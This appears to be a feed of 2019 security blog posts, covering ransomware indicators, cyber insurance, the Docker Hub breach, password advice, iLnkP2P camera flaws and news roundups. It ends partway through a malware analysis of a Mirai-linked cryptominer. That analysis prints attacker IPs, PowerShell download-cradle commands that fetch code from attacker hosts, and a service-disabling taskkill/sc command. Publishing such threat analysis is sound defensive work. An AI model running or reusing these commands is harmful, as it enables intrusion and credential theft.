a5bc1f94e7505a2e73c866551f7996f9

b3d3da12ca3b9efd042953caa6c3b8cd

faf4de4e1c5d8e4241088c90cfe8eddd

dece7ebb578772e466d3ecae5e2917f9

MayarChenot@protonmail[.]com

DharmaParrack@protonmail[.]com

wyattpettigrew8922555@mail[.]com

SayanWalsworth96@protonmail[.]com

SuzuMcpherson@protonmail[.]com

AbbsChevis@protonmail[.]com

QicifomuEjijika@o2[.]pl

RezawyreEdipi1998@o2[.]pl

AsuxidOruraep1999@o2[.]pl

IjuqodiSunovib98@o2[.]pl

aperywsqaroci@o2[.]pl

abbschevis@protonmail[.]com

asuxidoruraep1999@o2[.]pl

cottleakela@protonmail[.]com

couwetizotofo@o2[.]pl

dharmaparrack@protonmail[.]com

dutyuenugev89@o2[.]pl

phanthavongsaneveyah@protonmail[.]com

mayarchenot@protonmail[.]com

ijuqodisunovib98@o2[.]pl

qicifomuejijika@o2[.]pl

rezawyreedipi1998@o2[.]pl

qyavauzehyco1994@o2[.]pl

romanchukeyla@protonmail[.]com

sayanwalsworth96@protonmail[.]com

schreibereleonora@protonmail[.]com

suzumcpherson@protonmail[.]com

wyattpettigrew8922555@mail[.]com

The post LockerGoga Ransomware Family Used in Targeted Attacks appeared first on McAfee Blogs.

What This Report on Cyber Risk Gets Wrong

The Marsh brokerage unit of Marsh and McLennan recently announced a new evaluation process called Cyber Catalyst designed to determine the usefulness of enterprise cyber risk tools.

The goal of the new offering is to identify and implement industry-wide standards to help cyber insurance policyholders make more informed decisions about cyber-related products and services; basically, what works and what doesn’t. Other major insurers participating in Cyber Catalyst include Allianz, AXA XL, AXIS, Beazley, CFC, and Sompo International.

While this collaboration between insurance companies is unusual, it’s not entirely surprising. Cyber insurance is a $4 billion market globally. While it’s difficult to accurately gauge how many hacking attempts were successfully foiled by the products targeted here, data breaches and cyber attacks on businesses continue to increase in frequency and severity. The 2019 World Economic Forum’s Global Risks Report ranks “massive data fraud and theft” as the fourth greatest global risk, followed by “cyber-attacks” in the five slot.

Meanwhile, cybersecurity products and vendors have been, to be charitable, a mixed bag.

Good in Theory

From this standpoint, Cyber Catalyst seems like not just a good idea, but an obvious one. A standardized metric to determine which cybersecurity solutions are no better than a fig leaf and which ones provide real armor to defend against cyberattacks is sorely lacking in the cybersecurity space. By Marsh’s own estimates, there are more than three thousand cybersecurity vendors amounting to a $114 billion marketplace. Many of them don’t inspire confidence on the part of businesses.

Insurers have a vested interest in determining the effectiveness of cybersecurity products, weeding out buggy software and promoting effective solutions that can help address risk aggregation issues. Businesses and their data are in turn better protected, and at least in theory, they would pay less for coverage. Everyone wins.

Insurance companies did something similar in the 1950s with the creation of the Insurance Institute for Highway Safety. In the face of rising traffic collisions and fatalities, the insurance industry collaborated to establish a set of tests and ratings for vehicles, and the result has been a gold standard for automotive safety for decades. Using a similar strategy for cybersecurity would at least in theory help mitigate the ever-increasing costs and risks to companies and their data.

Or Maybe Not

Where the analogy to the Insurance Institute for Highway Safety breaks down is here: The threats to car drivers and passengers have ultimately stayed the same since its inception. Everything we’ve learned over the years about making cars has progressively led to safer vehicles. Information technology is vastly different in that iterative improvements in one specific area doesn’t necessarily make an organization as a whole safer or better protected against cyber threats–in fact sometimes it can have the opposite effect when a new feature added turns out to be a bug.

Cyber defenses are meaningless in the presence of an unintended, yet gaping, hole in an organization’s defenses. Then there is the march of sound innovation. Products that provided first-in-class protection for a business’s network a few years ago may no longer be so great where cloud computing and virtual servers, or BYOD are concerned. The attackable surface of every business continues to increase with each newly introduced technology, and it seems overly optimistic to assume the standard evaluation process (currently twice a year) would be able to keep pace with new threats.

There’s also the risk of putting too many eggs into one basket. While the diffuse nature of the cybersecurity market causes headaches for everyone involved, establishing a recommended solution or set of solutions effectively makes them an ideal target for hackers. While it’s important to keep consumers and businesses informed of potential risk to their information, cybersecurity issues require a certain amount of secrecy until they have been properly addressed. Compromising, or even identifying and reporting on a vulnerability before it’s been patched in an industry standard security product, process or vendor practice could cause a potentially catastrophic chain reaction for cyber insurers and their clients.

Culture Eats Strategy for Breakfast

Where the Cyber Catalyst program seems to potentially miss the mark is by overlooking the weakest link in any company’s security (i.e., its users). An advanced cybersecurity system or set of tools capable of blocking the most insidious and sophisticated attack can readily be circumvented by a spear phishing campaign, a compromised smartphone, or a disgruntled employee. Social engineering cannot be systematically addressed. Combatting the lures of compromise requires organizations to foster and maintain a culture of privacy and security.

The risk of employee over-reliance on tools and systems at the expense of training, awareness, and a company culture where cybersecurity is front and center must not be underestimated. While it is easier to opt for the quick and easy approach of purchasing a recommended solution, companies still need a comprehensive and evolving playbook to meet the ever-changing tactics of persistent, sophisticated and creative hackers.

While industry-wide cooperation may be a good thing, it’s vital for companies and insurers alike to recognize that any security program or service is fallible. Without an equal investment in functional cybersecurity, which places as much store in training employees and keeping aware of new threats, the rise in breaches and compromises will continue.

This article originally appeared on Inc.com.

The post What This Report on Cyber Risk Gets Wrong appeared first on Adam Levin.

TrustArc to Sponsor IAPP Global Privacy Summit 2019

TrustArc is excited to be part of the IAPP Global Privacy Summit in Washington, DC this week! The 2019 Summit will gather more than 3,600 professionals from all over the globe for an engaging program full of privacy experts. The conference features four days of education, guidance, inspiration and connections that will spotlight the big picture of data protection. To kick the conference off, TrustArc is hosting a Welcome Party with partner RADAR on Wednesday, May 1st. Clients, partners and friends will get together over drinks and food to network and touch base before diving into the following day’s first … Continue reading TrustArc to Sponsor IAPP Global Privacy Summit 2019

The post TrustArc to Sponsor IAPP Global Privacy Summit 2019 appeared first on TrustArc Blog.

Docker Hub Database Breached, As Many As 190,000 Accounts Affected

Veracode Container Security Docker Breach April 2019

Docker, a company that created an open platform for building and running distributed applications, reported to users that its Docker Hub database had been breached, exposing sensitive data from approximately 190,000 accounts. While that figure makes up less than five percent of Hub users, the data included some usernames and hashed passwords as well as Github and Bitbucket tokens for Docker autobuild. The company reported that the tokens have been revoked, and said it “acted quickly to intervene and secure the site.”

Experts who spoke with Motherboard indicated that the worst-case scenario is that hackers gain access to proprietary source code of some of those accounts. For context, companies on Docker’s roster include the likes of Paypal and Visa. Microsoft quickly reported that its official files hosted in Docker Hub were not compromised.

According to Veracode CTO Chris Wysopal, it is not yet known what the underlying vulnerability was at Docker Hub, but it is a serious breach as attackers could use the access tokens to get at a company’s source code. It is unclear if the attackers would have write privileges, which would enable backdooring into the code. Wysopal said each customer that was notified should be resetting access tokens and looking at logs for access. With revision control, this is all heavily audited.

Since Docker notified customers quickly, hopefully the impact is limited. The company emailed those impacted by the breach directly with a password reset link. Customers using autobuilds should check to ensure that their GitHub or Bitbucket repositories are still linked to the Docker Hub to ensure autobuilds work correctly moving forward.

Thousands of companies and millions of developers around the world use Docker to run containers, which are software packages that include code, runtime, settings, system libraries, and system tools. By isolating software from its surroundings, software containers enable code to always run the same regardless of the environment it is operating within. Although the company is still investigating the breach, if hackers have access to the private code in the repositories, they may be able to inject malicious code into software autobuilt by Docker.

Digital Parenting: ‘Eat Your Veggies, Brush Your Teeth, Strengthen Your Passwords’

strong password

strong passwordAs adults, we know the importance of strong passwords, and we’ve likely preached the message to our kids. But let’s rewind for a minute. Do our kids understand why strong passwords are important and why it needs to become a habit much like personal health and hygiene?

If we want the habit to stick, the reason why can’t be simply because we told them so. We’ve got to make it personal and logical.

Think about the habits you’ve already successfully instilled and the reasoning you’ve attached to them.

Brush your teeth to prevent disease and so they don’t fall out.
Eat a balanced diet so you have fuel for the day and to protect yourself from illness and disease.
Get enough sleep to restore your body and keep your mind sharp for learning.
Bathe and groom to wash away germs (and to keep people from falling over when you walk by). 

The same reasoning applies to online hygiene: We change our passwords (about every three months) to stay as safe as possible online and protect what matters. When talking to kids, the things that matter include our home address, our school name, our personal information (such as a parent’s credit card information, our social security number, or other account access).

Kids Targeted

We falsely believe that an adult’s information is more valuable than a child’s. On the contrary, given a choice, 10 out of 10 hackers would mine a child’s information over an adult’s because it’s unblemished. Determined identity thieves will use a child’s Social Security number to apply for government benefits, open bank, and credit card accounts, apply for a loan or utility service or rent an apartment. Also, once a child’s information is hacked, a thief can usually get to a parent’s information.

How to Stay Safe

It’s a tall task to prevent some of the massive data breaches in the news that target kids’ information. However, what is in our control, the ability to practice and teach healthy password habits in our home.

Tips for Families

strong passwordShake it up. According to McAfee Chief Consumer Security Evangelist Gary Davis, to bulletproof your passwords, make sure they are at least 12 characters long and include numbers, symbols, and upper and lowercase letters. Consider substituting numbers and symbols for letters, such as zero for “O” or @ for “A”.

Encourage kids to get creative and create passwords or phrases that mean something to them. For instance, advises Gary, “If you love crime novels you might pick the phrase: ILoveBooksOnCrime
Then you would substitute some letters for numbers and characters, and put a portion in all caps to make it even stronger, such as 1L0VEBook$oNcRIM3!”

Three random words. Password wisdom has morphed over the years as we learn more and more about hacking practices. According to the National Cyber Security Centre, another way to create a strong password is by using three random words (not birthdates, addresses, or sports numbers) that mean something to you. For instance: ‘lovepuppypaws’ or ‘drakegagacardib’ or ‘eatsleeprepeat’ or ‘tacospizzanutella’.

More than one password. Creating a new password for each account will head off cybercriminals if any of your other passwords are cracked. Consider a password manager to help you keep track of your passwords.

Change product default passwords immediately. If you purchase products for kids such as internet-connected gaming devices, routers, or speakers, make sure to change the default passwords to something unique, since hackers often know the manufacturer’s default settings.

When shopping online, don’t save info. Teach kids that when shopping on their favorite retail or gaming sites, not to save credit card information. Saving personal information to different accounts may speed up the checkout process. However, it also compromises data.

Employ extra protection. Comprehensive security software can protect you from several threats such as viruses, identity theft, privacy breaches, and malware designed to grab your data. Security software can cover your whole family as well as multiple devices.

Web Advisor. Keep your software up-to-date with a free web advisor that helps protect you from accidentally typing passwords into phishing sites.

strong password

Use unique passwords and MFA. This is also called “layering up.” 1) Use unique passwords for each of your accounts. By using different passwords, you avoid having all of your accounts become vulnerable if you are hacked (think domino effect). 2) MFA is Multi-Factor Authentication (also called two-step verification or authentication ). MFA confirms a user’s identity only after presenting two or more pieces of evidence. Though not 100% secure, this practice adds a layer of security to an account.

Keep it private. Kids love to show one another loyalty by sharing passwords and giving one another access to their social network accounts. DO NOT encourage this behavior. It’s reckless and could carry some serious privacy consequences. (Of course, sharing with parents, is recommended).

Credential Cracking

According to the Identity Theft Resource Center® (ITRC), the reported number of consumer records exposed containing sensitive personally identifiable information jumped 126 percent in 2018. The report explicitly stated password cracking as an issue: “The exploitation of usernames and passwords by nefarious actors continues to be a ripe target due to the increase in credential cracking activities – not to mention the amount of data that can be gleaned by accessing accounts that reuse the same credentials.”

May 2 is World Password Day and the perfect time to consider going over these password basics with your family.

The post Digital Parenting: ‘Eat Your Veggies, Brush Your Teeth, Strengthen Your Passwords’ appeared first on McAfee Blogs.

Webroot Culture: Serena Peruzzi Shares Her Side

Reading Time: ~4 min.

Today we chat with Web Analyst Manager Serena Peruzzi. Serena constantly filters through the web to analyze content. Sometimes her position requires looking through difficult material, but other times you can find her traveling, organizing company events, and even gardening!  

See how Serena helps build Webroot’s company culture in this Employee Spotlight.

How did you get into the technology field? 

During my undergrad in Translation and Interpreting 10 years ago, I came to realize how big a role automation and machine translation were going to play in my field. Thus, I decided to beat the trend to the punch and focus my research on Google Translate for my thesis; further on, I completed a master’s degree in Translation Technology, which mixed together traditional translation with state-of-the art localization technologies, and included leveraging on Machine Learning and language pattern recognitions to build automated translation engines. Google Translate pretty much rules the multilingual content scene for the general public, making content in more than 100 languages immediately accessible to the global audience with just one click. Also, a lot of crowdsourced content, for example travel or business reviews on the web, is also localized using machine translation technologies to maximize international reach. Additionally, many large corporations already leverage on customized enterprise machine translation engines to translate manuals and other documentation. There are already technologies allowing to converse in multiple languages in real-time, so there’s virtually no language barriers than cannot be overcome anymore; of course, provided you have an internet connection 

What does a week as a Web Analyst Manager look like? 

I typically have a few one-on-one calls with all remote Web Analysts on a weekly or bi-weekly basis, and two team meetings per week, one with the US and one with Sydney. We discuss top issues, upcoming tool updates and feature releases, and use the wisdom of the crowd to find a solution to difficult cases. We use a collaborative Kanban board to track the topics we discuss, so that we can always go back to them or track progress on resolutions. Finally, I work on a number of projects related to training, quality assessments, classification approvals, new implementations, case escalations from the team, and documentation. I also have a few gardening tasks to take care of, keeping the Webroot Threat plants alive is quite an arduous task!  

What have you learned / what skills have you built in this role? 

Customer care, URL threat analysis, and all aspects of people management are among the key skills I learned in the role. It also helped me keep up my passion for foreign languages, especially Spanish and Japanese, since I need to analyze web content from all over the world. 

What is the hardest thing about being a Web Analyst Manager? 

Explaining what a Web Analyst does is quite an arduous task, partially because it is a very complex and multi-faceted role involving analyzing large amounts of online content, but also because it involves, to some extent, evaluating content that may be disturbing or violent in nature, and it can be a difficult sell at times. 

What is your greatest accomplishment in your career at Webroot so far? 

Having helped build a global team of brilliant and enthusiastic minds is perhaps what makes me most proud of being a part of Webroot. The Web Analysts are first and foremost masters of languages and cultures; collectively we speak 12 different languages. The more languages you know, the more confidence you have in analyzing online content from all over the world, bringing different perspectives to the mix. Also, we have another element in common: we all want to make the internet a little safer for our user base. Because of that, building the team has always been an incredibly fun experience. It allows candidates to bring up their unique backgrounds and passions for different cultures and the IT security world in their interviews. 

Does your work allow you to travel a lot? Where are some of the coolest places you have travelled?  

I’ve travelled to San Diego, Colorado and Sydney with Webroot. While I enjoyed all my trips, I do have a weak spot for Australia. I am a big fan of water sports, and Australia offers the best sceneries for surfing and diving. It also hosts some of the most amazing animals I’ve ever seen. I’ll admit that my encounter with a group of Huntsmen in Sydney, despite being harmless spiders, had me run away fast. But when I first met Quokkas (smiling furry animals), they literally melted my heart 

Best career advice you’ve received? 

There’s a saying in Ireland which can be used as an antidote when things don’t go your way, “What’s for you won’t pass you.” I felt particularly close to it when I couldn’t attain a role in the past, as it ultimately led me to a different, extremely satisfactory role surrounded by amazing people. 

Are you involved in anything at Webroot outside of your day to day work? 

Aside from gardening, I’ve given a hand with organizing team-building and social events for Dublin in the past, including Christmas parties, Health Day, mini-golf and bubble football tournaments, and escape room challenges. Since the team is spread across three offices, team events vary based on group size and local amenities. In Ireland, we typically go out for a nice meal once a month, and order in food for celebrations; additionally, there are regular pub sessions with other Webroot teams. We also have office-wide team building activities on a quarterly basis, and/or when we have visitors on-site.  

Favorite memory on the job? 

St Patrick’s Day in the office, when I was in Support, was also a truly fun day. On our lunch break we went to Temple Bar, the very core of St Patrick’s celebrations, hid amongst the mayhem of thousands of party-goers celebrating, and then pinged the US team to spot us on the live street camera, just like in a game of “Where’s Waldo.” 

To learn more about life at Webroot, visit https://www.webroot.com/blog/category/life-at-webroot/

The post Webroot Culture: Serena Peruzzi Shares Her Side appeared first on Webroot Blog.

High Value Cryptocurrency Stolen by Hackers

Reading Time: ~2 min.

Hackers Breach Private Keys to Steal Cryptocurrency

A possible coding error allowed hackers to compromise at least 732 unique, improperly secured private keys used in the Ethereum blockchain. By exploiting a vulnerability, hackers have successfully stolen 38,000 Ethereum coins so far, translating to over $54 million in stolen funds, though the current number is likely much higher. While uncommon, such attacks do show that the industry’s security and key-generation standards have plenty of room for improvement.

Prominent Malware Reverse Engineer Faces Jail Time

The malware researcher Marcus Hutchins, who successfully reversed and stopped the WannaCry ransomware attacks in 2017, is facing up to six years of jail time for prior malware creation and distribution. Hutchins’ charges all tie back to his involvement in the creation of Kronos, a widespread banking Trojan that’s caused significant damage around the world.

Data Exposed for Thousands of Rehab Patients

Personally identifiable data belonging to nearly 145,000 patients of a Pennsylvania rehab facility have been found in a publicly available database. After a Shodan search, researchers discovered the database that contained roughly 4.9 million unique documents showing information ranging from names and birthdays to specific medical services provided and billing records, all of which could be used to to steal the identity of these thousands of individuals.

Study Finds Password Security Still Lacking

After this year’s review of password security it may come as no surprise that the top five passwords still in use are simple and have remained at the top for some time. Using a list generated from past data breaches, researchers found the password “123456” was used over 23 million times, with similar variations rounding out the top five. Several popular names, sports teams, and bands like blink182 and Metallica are still in use for hundreds of thousands of accounts. While these passwords may be easy to remember, they are exceedingly simple to guess. Stronger passwords should include multiple words or numbers to increase the complexity.

Bodybuilding Site Breached through Phishing Campaign

The website bodybuilding.com has announced they were the victim of a data breach stemming from an email phishing campaign in July 2018 that could affect many of the site’s clients. Fortunately, the site doesn’t store full payment card data, and the data it does store is only stored at the customer’s request, leaving little data for hackers to actually use. The site also forced a password reset for all users issued a warning about suspicious emails coming from bodybuilding.com, noting they may be part of another phishing campaign.

The post High Value Cryptocurrency Stolen by Hackers appeared first on Webroot Blog.

P2P Weakness Exposes Millions of IoT Devices

A peer-to-peer (P2P) communications technology built into millions of security cameras and other consumer electronics includes several critical security flaws that expose the devices to eavesdropping, credential theft and remote compromise, new research has found.

A map showing the distribution of some 2 million iLinkP2P-enabled devices that are vulnerable to eavesdropping, password theft and possibly remote compromise, according to new research.

The security flaws involve iLnkP2P, software developed by China-based Shenzhen Yunni Technology. iLnkP2p is bundled with millions of Internet of Things (IoT) devices, including security cameras and Webcams, baby monitors, smart doorbells, and digital video recorders.

iLnkP2P is designed to allow users of these devices to quickly and easily access them remotely from anywhere in the world, without having to tinker with one’s firewall: Users simply download a mobile app, scan a barcode or enter the six-digit ID stamped onto the bottom of the device, and the P2P software handles the rest.

A Webcam made by HiChip that includes the iLnkP2P software.

But according to an in-depth analysis shared with KrebsOnSecurity by security researcher Paul Marrapese, iLnkP2P devices offer no authentication or encryption and can be easily enumerated, allowing potential attackers to establish a direct connection to these devices while bypassing any firewall restrictions.

Marrapese said a proof-of-concept script he built identified more than two million vulnerable devices around the globe (see map above). He found that 39 percent of the vulnerable IoT things were in China; another 19 percent are located in Europe; seven percent of them are in use in the United States.

Although it may seem impossible to enumerate more than a million devices with just a six-digit ID, Marrapese notes that each ID begins with a unique alphabetic prefix that identifies which manufacturer produced the device, and there are dozens of companies that white-label the iLnkP2P software.

For example, HiChip — a Chinese IoT vendor that Marrapese said accounts for nearly half of the vulnerable devices — uses the prefixes FFFF, GGGG, HHHH, IIII, MMMM, ZZZZ.

These prefixes identify different product lines and vendors that use iLnkP2P. If the code stamped on your IoT device begins with one of these, it is vulnerable.

“In theory, this allows them to support nearly 6 million devices for these prefixes alone,” Marrapese said. “In reality, enumeration of these prefixes has shown that the number of online devices was ~1,517,260 in March 2019. By enumerating all of the other vendor prefixes, that pushes the number toward 2 million.”

Marrapese said he also built a proof-of-concept attack that can steal passwords from devices by abusing their built-in “heartbeat” feature. Upon being connected to a network, iLnkP2P devices will regularly send a heartbeat or “here I am” message to their preconfigured P2P servers and await further instructions.

“A P2P server will direct connection requests to the origin of the most recently-received heartbeat message,” Marrapese said. “Simply by knowing a valid device UID, it is possible for an attacker to issue fraudulent heartbeat messages that will supersede any issued by the genuine device. Upon connecting, most clients will immediately attempt to authenticate as an administrative user in plaintext, allowing an attacker to obtain the credentials to the device.”

To make matters worse, even if an attacker doesn’t want to bother intercepting device passwords, a great many of them will be running in their factory-default state with the factory-default password. The IoT malware Mirai proved this conclusively, as it rapidly spread to millions of devices using nothing more than the default credentials for IoT devices made by dozens of manufacturers.

What’s more, as we saw with Mirai the firmware and software built into these IoT devices is often based on computer code that is many years old and replete with security vulnerabilities, meaning that anyone able to communicate directly with them is also likely to be able to remotely compromise them with malicious software.

Marrapese said despite attempts to notify China’s CERT, iLnk and a half dozen major vendors whose products make up the bulk of the affected devices, none of them have responded to his reports — even though he first started reaching out to them more than four months ago. Neither HiChip nor iLnk responded to requests for comment sent by KrebsOnSecurity.

Interestingly, iLnk’s Web site (p1.i-lnk[.]com) currently appears to be non-functional, and a review of its HTML source code indicates the site is currently compromised by an obfuscated script that tries to redirect visitors to a Chinese gaming Web site.

Despite the widespread impact of these vulnerabilities, Marrapese’s research suggests that remediation from vendors is unlikely – and in fact, unfeasible.

“The nature of these vulnerabilities makes them extremely difficult to remediate for several reasons,” Marrapese wrote. “Software-based remediation is unlikely due to the infeasibility of changing device UIDs, which are permanently assigned during the manufacturing process. Furthermore, even if software patches were issued, the likelihood of most users updating their device firmware is low. Physical device recalls are unlikely as well because of considerable logistical challenges. Shenzhen Yunni Technology is an upstream vendor with inestimable sub-vendors due to the practice of white-labeling and reselling.”

Marrapese said there is no practical way to turn off the P2P functionality on the affected devices. Many IoT devices can punch holes in firewalls using a feature built into hardware-based routers called Universal Plug and Play (UPnP). But simply turning off UPnP on one’s router won’t prevent the devices from establishing a P2P connection as they rely on a different communications technique called “UDP hole punching.”

Marrapese said it should be possible to block vulnerable devices from communicating with any P2P servers by setting up firewall rules that block traffic destined for UDP port 32100.

However, a much safer idea would be to simply avoid purchasing or using IoT devices that advertise any P2P capabilities. Previous research has unearthed similar vulnerabilities in the P2P functionality built into other IoT systems. For examples of this, see This is Why People Fear the Internet of Things, and Researchers Find Fresh Fodder for IoT Attack Cannons.

Marrapese documented his findings in more detail here. The enumeration vulnerability has been assigned CVE-2019-11219, and the man-in-the-middle vulnerability has been assigned CVE-2019-11220.

Additional reading: Some Basic Rules for Securing your IoT Stuff.

This Week in Security News: Phishing Attacks and Ransomware

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about schemes used in phishing and other email-based attacks. Also, learn how ransomware continues to make a significant impact in the threat landscape.

Read on:

New Report Finds 25% of Phishing Attacks Circumvent Office 365 Security

As email remains to be a common infection vector because of how easily it can be abused, attackers continue to take advantage of it by crafting threats that are persistent in nature and massive in number. 

New Twist in the Stuxnet Story

What a newly discovered missing link to Stuxnet and the now-revived Flame cyber espionage malware add to the narrative of the epic cyber-physical attack.

Cybersecurity Proposal Pits Cyber Pros Against Campaign Finance Hawks

A Federal Election Commission proposal aims to help presidential and congressional campaigns steer clear of hacking operations by allowing nonprofits to provide cybersecurity free of charge.

New Sextortion Scheme Demands Payment in Bitcoin Cash

Trend Micro researchers uncovered a sextortion scheme targeting Italian-speaking users. Based on IP lookups of the spam emails’ senders, they appear to have been sent via the Gamut spam botnet.  

This Free Tool Lets You Test Your Hacker Defenses

Organizations will be able to test their ability to deter hackers and cyberattacks with a free new tool designed by experts at the UK’s National Cyber Security Centre to prepare them against online threats including malware, phishing and other malicious activities.

Ransomware Hits County Offices, Knocks The Weather Channel Offline

On April 18, the systems of The Weather Channel in Atlanta, Georgia, were infected by ransomware, disrupting the channel’s live broadcast for 90 minutes. 

Hacker Finds He Can Remotely Kill Car Engines After Breaking Into GPS Tracking Apps

A hacker broke into thousands of accounts belonging to users of two GPS tracker apps, giving him the ability to monitor the locations of tens of thousands of vehicles and even turn off the engines for some of them while they were in motion.

Uncovering CVE-2019-0232: A Remote Code Execution Vulnerability in Apache Tomcat

Trend Micro delves deeper into this vulnerability by expounding on what it is, how it can be exploited, and how it can be addressed. 

Hacker Dumps Thousands of Sensitive Mexican Embassy Documents Online

A hacker stole thousands of documents related to the inner workings of the Mexican embassy in Guatemala and posted them online.

Cybersecurity: UK Could Build an Automatic National Defense System, Says GCHQ Chief

The UK could one day create a national cyber-defense system built on sharing real-time cybersecurity information between intelligence agencies and business, the head of the UK’s Government Communications Headquarters said at CYBERUK 19.

Do you think the new hacker defenses tool will decrease the number of cyber-attacks targeted at organizations and public sectors? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Phishing Attacks and Ransomware appeared first on .

Weekly Update 136

Weekly Update 136

Scott is still here with me on the Gold Coast lapping up the sunshine before NDC Security next week so I thought we'd do this week's video next to the palm trees and jet ski 😎 But, of course, there's still a heap of stuff happening that's worthy of discussion, everything from the UK gov's NCSC doing good work to the Reply All podcast I was on this week to new data breaches to the ongoing shenanigans involving kids "smart" watches. And oh boy, the communications strategies of a couple of these in particular is just absolutely woeful. All that and more in this week's update.

Oh - and right after I published this, I noticed some crazy static for about 14 seconds at the 27:15 mark. Sorry - I'd republish it but I'd be looking at about 2 hours to re-render and re-upload and this is already going out a couple of hours late so, yeah, sorry!

Weekly Update 136
Weekly Update 136
Weekly Update 136

References

  1. The NCSC has published a list of the worst 100k passwords you can now go and download (these came from HIBP's Pwned Passwords list and are available to download in the clear)
  2. The Pwned Passwords API has really grown in usage lately (10.5M hits a day with a 98.4% cache hit ratio courtesy of Cloudflare)
  3. I was on the Reply All podcast again this week (these guys rock - listen to this podcast at every opportunity!)
  4. TicTokTrack is back online per the schedule they represented last week, but apparently the Sri Lanka bombings meant they were back online... when they said they would be? (that's a link to the original story, their PR process has been absolutely terrible)
  5. There are some very shady communications coming from SPACETALK in the wake of the TicTokTrack incident (seriously guys, when is ambulance chasing ever looked on as a good thing?!)
  6. Varonis is sponsoring my blog this week and giving you access to their free "Enemy Within" course (written by me!)
  7. And whilst we're talking insider threats, let us not forget the man who outsourced his job to China (6 years old now, still kinda stupid and hilarious at the same time)

Miners snatching open source tools to strengthen their malevolent power!

Estimated reading time: 10 minutes

From the last one year, Quick Heal Security Labs has been observing a boost in the number of mining malware. One of the ways to earn cryptocurrencies is to mine them. Nowadays cryptocurrency miner malware have become hot attack vectors for cybercriminals due to its ease of deployment and instant return on investments. We usually observe that such miners come with different techniques to deliver it to a victim. Attacker can download original open source software and slightly modify them rather than completely writing their own module.

In this blog post, we would talk about couple of cases where attack scenario is built on top of these open source tools. We would also talk about how the trend of abusing open source tools for building new malware is helping malware authors.

The trend is observed especially in cryptojacking cases. Though cryptojacking is a direct source of income for cybercriminals, stolen information from the victim’s systems can yield additional money for cybercriminals. So, these open source tools are used for various purposes like downloading frameworks, information stealing, crypto-mining, DNS Changer, Mirai bot and many more. This helped a lot to form a botnet of similar hosts to produce more hashes per second. Often such open source tools are easily available on Github and similar platforms. We can classify them as exploit frameworks, vulnerability scanners, password stealer, privilege elevators, evaders, etc.


Infection vector:

We received a miner downloader which downloads multiple components of the attack. This script may come to your system through spam mails, malicious URLs, free software bundler or any conventional method that is being used by all the malware variants. Also, we suspect that a powershell script seems to be the initial culprit. The behavior of the miner is a bit recursive in nature so we could not confirm its initial trace in the system.


Technical Analysis:

Fig. 1 Working of miner

The miner downloader creates a file named as ‘xpdown.dat’ which contains some IP addresses of C2 servers from where it downloads further components.

45.58.135.106
103.95.28.54
103.213.246.23
74.222.14.61
Ok.xmr6b.ru

It then downloads the following files from the domains:

hxxp://45.58.135.106/xpdown.dat
hxxp://45.58.135.106/down.html
hxxp://45.58.135.106/ok/64.html

It contains the IP which downloads the CPU Miner (174.128.248.10)

hxxp://45.58.135.106/kill.txt

It contains the following list of process to kill if it was running on victim machine.

lsmose.exe                            lsmos.exe                         conime.exe                            lsmosee.exe
1.exe                                      lsazs.exe                           tasksche.exe                          Zationa.exe
csrs.exe                                 shennong.bat                  svshpst.exe                            Spoolvs.exe
svchsot.exe                           xmrig.exe                        srvany.exe                              WinSCV.exe
csrswz.exe                            csrs.exe                              seser.exe                                severxxs.exe
mssecsvc.exe                       mssecsvr.exe                    dsbws.exe


Then malware downloads a text file which contains the information of multiple payloads to be downloaded.

hxxp://45.58.135.106/down.txt

And this down.txt contains the following links. The malware then opens a TCP port 32381 on the system.

hxxp://213.183.45.201/downs.exe              (C:\windows\system\downs.exe)
hxxp://66.117.6.174/ups.rar                         (C:\windows\system\cab.exe)
hxxp://213.183.60.7/b.exe                            (C:\windows\inf\msief.exe)
hxxp://174.128.239.250/item.dll                 (C:\windows\debug\item.dat)

Looking at the links in the file we observed following things.

Downs.exe is a modified version of Microsoft “CACLS” (Which displays and modifies the access control list). Ups.rar is downloaded as cab.exe. This component is a downloader for windows variant of Mirai botnet. This also acts as a DNS Changer and opens a backdoor in the system. On execution, it performs multiple operations like modifying the DNS entry in the host with IP “223.5.5.5” which has the Geo location in China and ISP of DNS is “Hangzhou Alibaba Advertising Co.,Ltd.”

 

Fig. 2 Window Server Check

 

Then it checks whether the compromised machine is a window server or not by calling GetVersionExA. It downloads update.txt from C2 server, if the machine is server, and drops at “C:\windows\system\uplist.txt”. The uplist.txt contains the following payload to be downloaded and executed.

hxxp://66.117.6.174/wpd.jpg                     (C:\windows\system\msinfo.exe)
hxxp://66.117.6.174/my1.html                   (C:\windows\system\my1.bat)

It also downloads npptools.dll, 64npf.sys, npf.sys, nsoak.dat, packet.dll and wpcap.dll. These are files used for network packets processing loaded by msinfo.exe during its execution.

Let’s look into these components one by one.

my1.bat:

It contains the code which is very stealthy and evasive as it uses several techniques such as “Squiblydoo”, “download cradle” and WMI Event Subscription persistence exploit to run malicious content on infected machines.

The WMI script contains multiple PowerShell scripts.

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(‘hxxp://173.208.139.170/s.txt’)

This text file contains another PowerShell downloader as follows:

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(‘hxxp://74.222.1.38/up.txt’)

“Up.txt” contains the code which collects information regarding System OS, Physical Memory, List of running processes using WMI classes and then downloads Powershell format of Mimikatz from Github.

Further it steals the credentials from the compromised machine and uploads it to the FTP server IP:192.187.111.66 with hard coded credential of FTP.

Fig. 3 Victims Data in FTP Server.

Msinfo.exe:

 It is basically a windows version of Mirai botnet. As more of its code matches with Mirai source code which was leaked previously. Upon execution with command line parameters “-create” “-run”, it checks the architecture of the current system whether it is x86, MIPS, ARM etc. Based on the identification, it will check for its latest update and download if available.

It performs the following task as per an encrypted file downloaded from C2 server.

  1. Implements spreader mechanism by performing in the form of blind SQLi (sql injection), brute force techniques by using crack library and hydra tool.
              [Cracker:Telnet][Cracker:MSSQL] [Cracker:CCTV][Cracker:MS17010], CrackerWMI, CrackerSSH
  1. It scans various ports such as 80,8000,445 using masscan (a very fastport scanner an open source project) which operates similar to nmap , the popular port scanning tool.
              https://github.com/robertdavidgraham/masscan
  1. Disable specific services by invoking the following command:
              C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc stop netprofm&sc config netprofm
              start= disabled&sc stop NlaSvc&sc config     NlaSvc start=disabled
